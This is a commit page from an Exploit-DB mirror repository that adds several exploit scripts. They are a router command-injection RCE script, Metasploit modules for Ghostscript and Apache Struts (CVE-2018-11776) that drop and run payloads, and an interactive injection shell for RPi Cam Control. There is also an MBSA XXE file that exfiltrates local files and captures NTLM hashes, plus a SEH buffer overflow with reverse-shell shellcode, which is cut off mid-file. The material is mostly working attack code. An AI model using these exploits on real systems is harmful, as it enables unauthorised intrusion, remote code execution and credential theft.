bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-09-11

Browse source 
12 changes to exploits/shellcodes

SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH)
Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH)
Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH)
Any Sound Recorder 2.93 - Denial of Service (PoC)
Zenmap (Nmap) 7.70 - Denial of Service (PoC)
Ghostscript - Failed Restore Command Execution (Metasploit)
VirtualBox 5.2.6.r120293 - VM Escape

Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)

RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities
RPi Cam Control < 6.3.14 - Multiple Vulnerabilities
LW-N605R 12.20.2.1486 - Remote Code Execution
RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution
This commit is contained in:
Offensive Security 2018-09-11 05:01:54 +00:00
parent 59859ec4e8
commit 87053f010c
13 changed files with 1184 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

146
exploits/hardware/webapps/45351.py Executable file
View file

@ -0,0 +1,146 @@
# Title: LW-N605R 12.20.2.1486 - Remote Code Execution
# Date: 2018-09-09
# Author: Nassim Asrir
# Vendor: LINK-NET
# Product Link: http://linknet-usa.com/main/product_info.php?products_id=35&language=es
# Firmware version: 12.20.2.1486
# CVE: N/A
# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the
# HOST field of the ping feature at adm/systools.asp.
# Authentication is needed but the default password of admin for the admin
# account may be used in some cases.
# Example:
# [root@parrot]─[/home/sniperpex/Desktop]
# #python ./blue.py -t http://host/ -c ls -u admin -p admin
'''
_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim
[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!
var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2
import base64
import optparse
import sys
import bs4
banner = """
_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url+"/goform/sysTools"
def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] LW-N605R Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "putmsg(mPingCount);" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'e' in content:
print '[!] Command "'+cmd+'": was executed!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No LW-N605R page found'
soup = bs4.BeautifulSoup(content, 'html.parser')
for textarea in soup.find_all('textarea'):
print textarea.get_text()
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)

118
exploits/linux/local/45369.rb Executable file
View file

@ -0,0 +1,118 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
PLACEHOLDER_STRING = 'metasploit'
PLACEHOLDER_COMMAND = 'echo vulnerable > /dev/tty'
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Ghostscript Failed Restore Command Execution',
'Description' => %q{
This module exploits a -dSAFER bypass in Ghostscript to execute
arbitrary commands by handling a failed restore (grestore) in
PostScript to disable LockSafetyParams and avoid invalidaccess.
This vulnerability is reachable via libraries such as ImageMagick,
and this module provides the latest vector for Ghostscript.
For previous Ghostscript vectors, please see the following modules:
exploit/unix/fileformat/ghostscript_type_confusion
exploit/unix/fileformat/imagemagick_delegate
},
'Author' => [
'Tavis Ormandy', # Vuln discovery and exploit
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-16509'],
['URL', 'http://seclists.org/oss-sec/2018/q3/142'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1640']
],
'DisclosureDate' => 'Aug 21 2018',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total
],
['PowerShell (In-Memory)',
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_memory
],
['Linux (Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
])
register_advanced_options([
OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
])
end
def exploit
sploit = template
# Replace our placeholder string with a random one
sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))
# Replace our test payload with the real one
case target['Type']
when :unix_memory
sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
when :psh_memory
psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
# XXX: Payload space applies to the payload, not the PSH command
if psh.length > targets[0].payload_space
fail_with(Failure::BadConfig, 'Please choose a smaller payload')
end
sploit.sub!(PLACEHOLDER_COMMAND, psh)
when :linux_dropper
cmdstager = generate_cmdstager(
linemax: targets[0].payload_space,
temp: datastore['WritableDir']
).join(';')
# XXX: Payload space applies to the payload, not the command stager
if cmdstager.length > targets[0].payload_space
fail_with(Failure::BadConfig, 'Please choose a smaller command stager')
end
sploit.sub!(PLACEHOLDER_COMMAND, cmdstager)
end
file_create(sploit)
end
def template
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
))
end
end

14
exploits/linux/local/45372.txt Normal file
View file

@ -0,0 +1,14 @@
Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000
I didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected.
Find a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative.
In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server as Guest and Ubuntu Desktop as host running VirtualBox 5.2.6.r120293.
The proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844
https://www.voidsecurity.in/2018/08/from-compiler-optimization-to-code.html
https://github.com/renorobert/virtualbox-cve-2018-2844
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45372.zip

104
exploits/linux/webapps/45361.py Executable file
View file

@ -0,0 +1,104 @@
#!/usr/bin/python
import sys
import requests
import os
import re
import readline
def usage():
print "\nRPi Cam Web Interface Exploit\n"
print "Usage: %s http://host/path/to/preview.php \n" % sys.argv[0]
print "Options: "
print " -h, --help Show this help message and exit"
print ""
sys.exit(0)
def execute_command(url, cmd):
split = "---a97a13f9f48c65c72e4802fc1e516e3f---"
convert = ".) >/dev/null 2>&1; (" + cmd + ") 2>&1; echo " + split + ";#aaaaaaa"
convertCmd = "/usr/bin/ffmpeg -f image2 -i i_%05d.jpg"
data = {"convert":convert,"convertCmd":convertCmd}
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"}
try:
r = requests.post(url, headers=headers, data=data, verify=False)
if r.status_code == 200:
if len(r.content) > 0 and split in r.content:
return r.content.split(split)[0]
else:
return ""
else:
print "\n[*] Error: Received HTTP Status " + str(r.status_code) + "\n"
return ""
except requests.ConnectionError as e:
print "\n[*] Error: An error occurred while connecting to the host.\n"
exit(1)
except requests.exceptions.RequestException as e:
print "\n[*] Error: Something unexpected happened.\n"
print e
exit(1)
def main():
if len(sys.argv) < 2 or sys.argv[1] in ("-h", "--help"):
usage()
url = sys.argv[1]
print "\nRPi Cam Web Interface Exploit"
print "\n[*] Attempting exploit on:"
print " " + url
username = execute_command(url,"whoami").strip()
if len(username) == 0:
exit(1)
hostname = execute_command(url, "hostname").strip()
path = execute_command(url, "pwd").strip()
print "\n[*] Returning prompt!\n"
try:
while True:
prompt = username + "@" + hostname + ":" + path + "$ "
cmd = raw_input(prompt)
if cmd == "exit":
print "\n[*] Goodbye!\n"
return
elif cmd.startswith("cd "):
chars = set(";&|")
if any((c in chars) for c in cmd):
print "[*] This shell only supports cd as a standalone command."
else:
cmd = cmd.split()
tmpPath = " ".join(cmd[1:])
if tmpPath == "..":
if len(path.split("/")) > 2:
tmpPath = "/".join(path.split("/")[:-1])
else:
tmpPath = "/"
cmd = "cd " + path + " && cd " + tmpPath + " 2>&1 && pwd"
tmpPath = execute_command(url,cmd).strip()
if tmpPath.startswith("/") or re.match("^[a-zA-Z]:\\)*",tmpPath):
path = tmpPath
else:
print tmpPath.split('\n')[0]
elif cmd == "clear":
os.system("clear")
else:
cmd = "cd " + path + " && " + cmd
results = execute_command(url, cmd)
if len(results) != 0:
print results
except KeyboardInterrupt:
print "\n\n[*] Goodbye!\n"
return
if __name__ == "__main__":
main()

390
exploits/multiple/remote/45367.rb Executable file
View file

@ -0,0 +1,390 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
# Eschewing CmdStager for now, since the use of '\' and ';' are killing me
#include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',
'Description' => %q{
This module exploits a remote code execution vulnerability in Apache Struts
version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed
via an endpoint that makes use of a redirect action.
Native payloads will be converted to executables and dropped in the
server's temp dir. If this fails, try a cmd/* payload, which won't
have to write to the disk.
},
#TODO: Is that second paragraph above still accurate?
'Author' => [
'Man Yue Mo', # Discovery
'hook-s3c', # PoC
'asoto-r7', # Metasploit module
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-11776'],
['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],
['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],
['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],
],
'Privileged' => false,
'Targets' => [
[
'Automatic detection', {
'Platform' => %w{ unix windows linux },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
},
],
[
'Windows', {
'Platform' => %w{ windows },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
},
],
[
'Linux', {
'Platform' => %w{ unix linux },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}
},
],
],
'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),
OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),
OptString.new('ENABLE_STATIC', [ true, 'Enable "allowStaticMethodAccess" before executing OGNL', true ]),
]
)
register_advanced_options(
[
OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),
OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', "X-#{rand_text_alpha(4)}"] ),
OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', "#{rand_text_alpha(8)}"] ),
]
)
end
def check
# METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable
ognl = "#_memberAccess['allowStaticMethodAccess']"
resp = send_struts_request(ognl)
# If vulnerable, the server should return an HTTP 302 (Redirect)
# and the 'Location' header should contain either 'true' or 'false'
if resp && resp.headers['Location']
output = resp.headers['Location']
vprint_status("Redirected to: #{output}")
if (output.include? '/true/')
print_status("Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'")
datastore['ENABLE_STATIC'] = false
CheckCode::Vulnerable
elsif (output.include? '/false/')
print_status("Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'")
datastore['ENABLE_STATIC'] = true
CheckCode::Vulnerable
else
CheckCode::Safe
end
elsif resp && resp.code==400
# METHOD 2: Generate two random numbers, ask the target to add them together.
# If it does, it's vulnerable.
a = rand(10000)
b = rand(10000)
c = a+b
ognl = "#{a}+#{b}"
resp = send_struts_request(ognl)
if resp.headers['Location'].include? c.to_s
vprint_status("Redirected to: #{resp.headers['Location']}")
print_status("Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'")
datastore['ENABLE_STATIC'] = false
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
end
def exploit
case payload.arch.first
when ARCH_CMD
resp = execute_command(payload.encoded)
else
resp = send_payload()
end
end
def encode_ognl(ognl)
# Check and fail if the command contains the follow bad characters:
# ';' seems to terminates the OGNL statement
# '/' causes the target to return an HTTP/400 error
# '\' causes the target to return an HTTP/400 error (sometimes?)
# '\r' ends the GET request prematurely
# '\n' ends the GET request prematurely
# TODO: Make sure the following line is uncommented
bad_chars = %w[; \\ \r \n] # and maybe '/'
bad_chars.each do |c|
if ognl.include? c
print_error("Bad OGNL request: #{ognl}")
fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
end
end
# The following list of characters *must* be encoded or ORNL will asplode
encodable_chars = { "%": "%25", # Always do this one first. :-)
" ": "%20",
"\"":"%22",
"#": "%23",
"'": "%27",
"<": "%3c",
">": "%3e",
"?": "%3f",
"^": "%5e",
"`": "%60",
"{": "%7b",
"|": "%7c",
"}": "%7d",
#"\/":"%2f", # Don't do this. Just leave it front-slashes in as normal.
#";": "%3b", # Doesn't work. Anyone have a cool idea for a workaround?
#"\\":"%5c", # Doesn't work. Anyone have a cool idea for a workaround?
#"\\":"%5c%5c", # Doesn't work. Anyone have a cool idea for a workaround?
}
encodable_chars.each do |k,v|
#ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)
ognl.gsub!("#{k}","#{v}")
end
return ognl
end
def send_struts_request(ognl, payload: nil)
=begin #badchar-checking code
pre = ognl
=end
ognl = "${#{ognl}}"
vprint_status("Submitted OGNL: #{ognl}")
ognl = encode_ognl(ognl)
headers = {'Keep-Alive': 'timeout=5, max=1000'}
if payload
vprint_status("Embedding payload of #{payload.length} bytes")
headers[datastore['HEADER']] = payload
end
# TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs
uri = "/#{ognl}/#{datastore['ACTION']}"
resp = send_request_cgi(
#'encode' => true, # this fails to encode '\', which is a problem for me
'uri' => uri,
'method' => datastore['HTTPMethod'],
'headers' => headers
)
if resp && resp.code == 404
fail_with(Failure::UnexpectedReply, "Server returned HTTP 404, please double check TARGETURI and ACTION options")
end
=begin #badchar-checking code
print_status("Response code: #{resp.code}")
#print_status("Response recv: BODY '#{resp.body}'") if resp.body
if resp.headers['Location']
print_status("Response recv: LOC: #{resp.headers['Location'].split('/')[1]}")
if resp.headers['Location'].split('/')[1] == pre[1..-2]
print_good("GOT 'EM!")
else
print_error(" #{pre[1..-2]}")
end
end
=end
resp
end
def profile_target
# Use OGNL to extract properties from the Java environment
properties = { 'os.name': nil, # e.g. 'Linux'
'os.arch': nil, # e.g. 'amd64'
'os.version': nil, # e.g. '4.4.0-112-generic'
'user.name': nil, # e.g. 'root'
#'user.home': nil, # e.g. '/root' (didn't work in testing)
'user.language': nil, # e.g. 'en'
#'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)
}
ognl = ""
ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
ognl << %Q|('#{rand_text_alpha(2)}')|
properties.each do |k,v|
ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|
end
ognl = ognl[0...-4]
r = send_struts_request(ognl)
if r.code == 400
fail_with(Failure::UnexpectedReply, "Server returned HTTP 400, consider toggling the ENABLE_STATIC option")
elsif r.headers['Location']
# r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'
# Extract the OGNL output from the Location path, and strip the two random chars
s = r.headers['Location'].split('/')[1][2..-1]
if s.nil?
# Since the target didn't respond with an HTTP/400, we know the OGNL code executed.
# But we didn't get any output, so we can't profile the target. Abort.
return nil
end
# Confirm that all fields were returned, and non include extra (:) delimiters
# If the OGNL fails, we might get a partial result back, in which case, we'll abort.
if s.count(':') > properties.length
print_error("Failed to profile target. Response from server: #{r.to_s}")
fail_with(Failure::UnexpectedReply, "Target responded with unexpected profiling data")
end
# Separate the colon-delimited properties and store in the 'properties' hash
s = s.split(':')
i = 0
properties.each do |k,v|
properties[k] = s[i]
i += 1
end
print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" +
" #{properties[:'os.arch']}, running as #{properties[:'user.name']}")
return properties
else
print_error("Failed to profile target. Response from server: #{r.to_s}")
fail_with(Failure::UnexpectedReply, "Server did not respond properly to profiling attempt.")
end
end
def execute_command(cmd_input, opts={})
# Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.
if cmd_input.include? ';'
print_warning("WARNING: Command contains bad characters: semicolons (;).")
end
begin
properties = profile_target
os = properties[:'os.name'].downcase
rescue
vprint_warning("Target profiling was unable to determine operating system")
os = ''
os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
end
if (os.include? 'linux') || (os.include? 'nix')
cmd = "{'sh','-c','#{cmd_input}'}"
elsif os.include? 'win'
cmd = "{'cmd.exe','/c','#{cmd_input}'}"
else
vprint_error("Failed to detect target OS. Attempting to execute command directly")
cmd = cmd_input
end
# The following OGNL will run arbitrary commands on Windows and Linux
# targets, as well as returning STDOUT and STDERR. In my testing,
# on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.
vprint_status("Executing: #{cmd}")
ognl = ""
ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|
ognl << %q|(#p.redirectErrorStream(true)).|
ognl << %q|(#process=#p.start()).|
ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|
ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|
ognl << %q|(#r.flush())|
r = send_struts_request(ognl)
if r && r.code == 200
print_good("Command executed:\n#{r.body}")
elsif r
if r.body.length == 0
print_status("Payload sent, but no output provided from server.")
elsif r.body.length > 0
print_error("Failed to run command. Response from server: #{r.to_s}")
end
end
end
def send_payload
# Probe for the target OS and architecture
begin
properties = profile_target
os = properties[:'os.name'].downcase
rescue
vprint_warning("Target profiling was unable to determine operating system")
os = ''
os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
end
data_header = datastore['HEADER']
if data_header.empty?
fail_with(Failure::BadConfig, "HEADER parameter cannot be blank when sending a payload")
end
random_filename = datastore['TEMPFILE']
# d = data stream from HTTP header
# f = path to temp file
# s = stream/handle to temp file
ognl = ""
ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']
ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|
ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).|
ognl << %q|(#f.setExecutable(true)).|
ognl << %q|(#f.deleteOnExit()).|
ognl << %q|(#s=new java.io.FileOutputStream(#f)).|
ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|
ognl << %q|(#s.write(#d)).|
ognl << %q|(#s.close()).|
ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
ognl << %q|(#p.start()).|
ognl << %q|(#f.delete()).|
success_string = rand_text_alpha(4)
ognl << %Q|('#{success_string}')|
exe = [generate_payload_exe].pack("m").delete("\n")
r = send_struts_request(ognl, payload: exe)
if r && r.headers && r.headers['Location'].split('/')[1] == success_string
print_good("Payload successfully dropped and executed.")
elsif r && r.headers['Location']
vprint_error("RESPONSE: " + r.headers['Location'])
fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
elsif r && r.code == 400
fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload")
end
end
end

52
exploits/windows/local/45354.txt Normal file
View file

@ -0,0 +1,52 @@
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
# Date: 2018-09-08
# Author: John Page (aka hyp3rlinx)
# Vendor: Microsoft
# Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558
# Software Version: 2.3
# References: ZDI-CAN-6307
# References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
# References: hyp3rlinx.altervista.org
# Security Issue
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker
# controlled server if a user opens a specially crafted ".mbsa" file.
# Exploit/POC
# Install MBSA
# https://www.microsoft.com/en-us/download/details.aspx?id=7558
# 1) "evil.mbsa"
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
# 2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
# When victim attempts open file they get prompted "Do you want to let this app
# make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft.
# After opening the local users files can be exfiltrated to a remote server.
# Moreover, we can use this to steal NTLM hashes.
# Using Forced Authentication to steal NTLM hashes
# 2) msf > use auxiliary/server/capture/smb
# msf auxiliary(smb) > exploit -j
"evil.mbsa"
<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>
# Result: credentials captured by remote sever

67
exploits/windows_x86/local/45350.py Executable file
View file

@ -0,0 +1,67 @@
# Exploit Title: SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:http://www.dvd-photo-slideshow.com/ipod-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Reported but got no reply back
# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Help" > "Register ...
# 4. Now paste the content of "exploit.txt" into the field:"Registration Name" + "Regestration Key".
# Click "Apply" > "Ok"
# You will see a sweet reverse shell poped up in your attacker box.
buffer = "A" * (548-36)
#0x1004793e : pop edi # pop esi # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0
#(C:\Program Files\Socusoft\Socusoft iPod Photo Slideshow\DVDPhotoData.dll)
nseh = "\xeb\x06\x90\x90"
seh = "\x3e\x79\x04\x10"
nops = "\x90" * 18
# Badchar \x00\x0a\x0d
# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337
# -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
buf += "\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
buf += "\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
buf += "\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
buf += "\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
buf += "\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
buf += "\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
buf += "\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
buf += "\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
buf += "\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
buf += "\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
buf += "\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
buf += "\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
buf += "\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
buf += "\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
buf += "\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
buf += "\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
buf += "\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
buf += "\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
buf += "\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
buf += "\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
buf += "\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
buf += "\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
buf += "\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
buf += "\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
buf += "\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
pad ="C" * (1500 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
exploit = buffer + nseh + seh + nops + buf + pad
try:
f=open("exploit.txt","w")
